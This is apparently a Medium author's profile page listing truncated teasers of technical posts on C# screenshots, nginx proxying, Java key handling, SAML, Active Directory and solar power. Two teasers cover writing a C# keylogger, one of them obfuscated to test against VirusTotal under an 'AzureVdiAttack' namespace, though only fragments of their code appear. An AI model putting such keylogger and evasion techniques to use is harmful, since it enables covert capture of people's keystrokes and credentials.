Open in app

Sign In

Write

Sign In

Jakub Jóźwicki
Jakub Jóźwicki

20 Followers

Home

About

3 days ago

How to make screenshot in C#

How to make screenshot in C# [DllImport("user32.dll", SetLastError = true)] static extern IntPtr GetDC(IntPtr hWnd); [DllImport("user32.dll", SetLastError = true)] static extern IntPtr WindowFromDC(IntPtr hdc); [DllImport("user32.dll")] static extern bool GetWindowRect(IntPtr hWnd, ref RECT rect); [DllImport("gdi32.dll", EntryPoint = "BitBlt", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] static extern bool BitBlt([In] IntPtr hdc, int nXDest, int nYDest, int nWidth, int nHeight, [In] IntPtr hdcSrc, int nXSrc, int nYSrc, uint dwRop); var src = GetDC(IntPtr.Zero); RECT r = new RECT(); GetWindowRect(WindowFromDC(src), ref r); int rW = 2*(r.Right — r.Left); // because we don’t want to get exact DPI scaling int rH = 2*(r.Bottom — r.Top); var bmp = new Bitmap(rW, rH); var g = System.Drawing.Graphics.FromImage(bmp); var dst = g.GetHdc(); BitBlt(dst, 0, 0, rW, rH, src, 0, 0, 0x00CC0020); g.ReleaseHdc(); bmp.Save(“screengrab.png”, System.Drawing.Imaging.ImageFormat.Png);

Screenshot Tool

1 min read

Screenshot Tool

1 min read


Aug 2

How to proxy any REST and WebSocket with nginx

mkdir -p /etc/nginx/conf.d cat <<'EOF' > /etc/nginx/conf.d/nginx.pem -----BEGIN CERTIFICATE----- MIIG... -----END CERTIFICATE----- EOF cat <<'EOF' > /etc/nginx/conf.d/nginx-key.pem -----BEGIN ENCRYPTED PRIVATE KEY----- MIIF... -----END ENCRYPTED PRIVATE KEY----- EOF CLOUDENV=$(https_proxy= aws ssm get-parameter --name /app/environment --output text --cli-read-timeout 30 --cli-connect-timeout 30 2>/dev/null | awk '{print $6}') CERTPASS=$(https_proxy= aws ssm get-parameter --name /app/$CLOUDENV/https_cert_pass --with-decryption --output yaml 2>/dev/null| grep -e "^ Value: " | cut…

Nginx

1 min read

Nginx

1 min read


Jul 8

Obfuscated keylogger in C#

Let’s see what Virus Total tells using System; using System.Runtime.InteropServices; using System.Collections.Generic; using System.Diagnostics; using System.Text; using System.Management; namespace AzureVdiAttack { static class TextHelper { public static byte[] ByteSequence(byte min, byte max) { var arr = new List<byte>(); while (min <= max) { arr.Add(min++)…

Keylogger

3 min read

Keylogger

3 min read


Jul 8

How to write keylogger in C#

We need a lot of interaction with Win32 API using System; using System.Runtime.InteropServices; using System.Collections.Generic; using System.Diagnostics; using System.Text; using System.Management; namespace Keylogger { class Keylogger { static readonly int WH_KEYBOARD_LL = 13; static int hHook = 0; static StringBuilder buffer = new StringBuilder(256); delegate int HookProc(int code…

Keylogger

3 min read

Keylogger

3 min read


Jun 22

How to destroy Java PrivateKey

The default PrivateKey.destroy() may not be implemented private static void xor(byte[] p, byte[] key) { for (int i=0; i < p.length; i++) { p[i] = (byte)(p[i] ^ key[i % key.length]); } } public final static void main(String[] args) throws Exception { KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(4096); KeyPair kp = keyPairGenerator.generateKeyPair(); byte[] encKey = kp.getPrivate().getEncoded(); byte[] text = "This is a sample text!".getBytes(); xor(text, encKey); PrivateKey pk = kp.getPrivate(); try { pk.destroy(); } catch (Exception e) { Field keyField = sun.security.pkcs.PKCS8Key.class.getDeclaredField("key"); keyField.setAccessible(true); keyField.set(pk, new byte[] { 0 }); Field encodedField = sun.security.pkcs.PKCS8Key.class.getDeclaredField("encodedKey"); encodedField.setAccessible(true); encodedField.set(pk, null); RSAPrivateKey asRsa = (RSAPrivateKey) pk; clear(asRsa.getModulus()); clear(asRsa.getPrivateExponent()); } xor(text, pk.getEncoded()); System.out.println(new String(text)); } private static void clear(BigInteger bigInt) throws Exception { Field valField = bigInt.getClass().getDeclaredField("mag"); valField.setAccessible(true); valField.set(bigInt, new int[] { 0 }); }

Java

1 min read

Java

1 min read


May 9

Co ma wspólnego hybrydowa Toyota z fotowoltaiką na dachu?

Nowoczesne instalacje solarne też mogą być hybrydowe — z własną domową baterią można konsumować zielony prąd gdy jest pochmurno, pada deszcz lub w nocy. Jak to działa? Panele na dachu generują prąd elektryczny stały, przy małej instalacji kilkaset Volt. Urządzenia w domu zasilane są prądem przemiennym 230V (+-10%). Prąd stały…

Fotowoltaika

3 min read

Co ma wspólnego hybrydowa Toyota z fotowoltaiką na dachu?
Co ma wspólnego hybrydowa Toyota z fotowoltaiką na dachu?
Fotowoltaika

3 min read


Oct 18, 2022

How to enumerate own Active Directory groups in Java

A lot of code lines must be written… import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.InetAddress; import java.net.Socket; import java.net.UnknownHostException; import java.security.cert.X509Certificate; import java.text.MessageFormat; import java.util.ArrayList; import java.util.Enumeration; import java.util.Hashtable; import java.util.List;

Ldap

2 min read

Ldap

2 min read


Oct 14, 2022

How to write a very simple Java proxy (which can be compiled to a native Linux ELF) to fix SAML requests

Because sometimes it’s not possible to change sender and receiver and you must have a man in the middle.. import java.io.IOException; import java.io.OutputStream; import java.net.InetSocketAddress; import java.net.URI; import java.net.URLEncoder; import java.nio.ByteBuffer; import java.util.Base64; import java.util.concurrent.atomic.AtomicReference; import java.util.regex.Pattern; import java.util.zip.DataFormatException; import java.util.zip.Deflater; import java.util.zip.Inflater; import com.sun.net.httpserver.HttpExchange; import com.sun.net.httpserver.HttpHandler; import com.sun.net.httpserver.HttpServer…

Saml

2 min read

Saml

2 min read


Sep 29, 2022

Guacamole doesn’t want to connect to RHEL 9

As of time of writing Guacamole 1.4.0 available from DockerHub is built on old Debian with old libssh2 1.8.0 not supporting EC cryptography. To be able to use modern SSH we must bake own guacd container image. I decided to do it one time manually, so the Dockerfile is simplified…

Guacamole

2 min read

Guacamole

2 min read


Aug 16, 2022

API Security across microservices

The first choice for API security in the microservice architecture is OpenID Connect 1.0 and JWT. It’s important to know that there many ways to use JWT incorrectly. The JWT created as a result of interactive user authentication is copied to next (nested) API calls. It’s very easy to copy…

Api Security

4 min read

API Security across microservices
API Security across microservices
Api Security

4 min read

Jakub Jóźwicki

Jakub Jóźwicki

20 Followers

Cloud Security Engineer

Following
  • Eric Elliott

    Eric Elliott

  • Sai Gopal T

    Sai Gopal T

  • Sean Dexter

    Sean Dexter

  • Kate Dames

    Kate Dames

  • Jaana Dogan

    Jaana Dogan

See all (14)

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams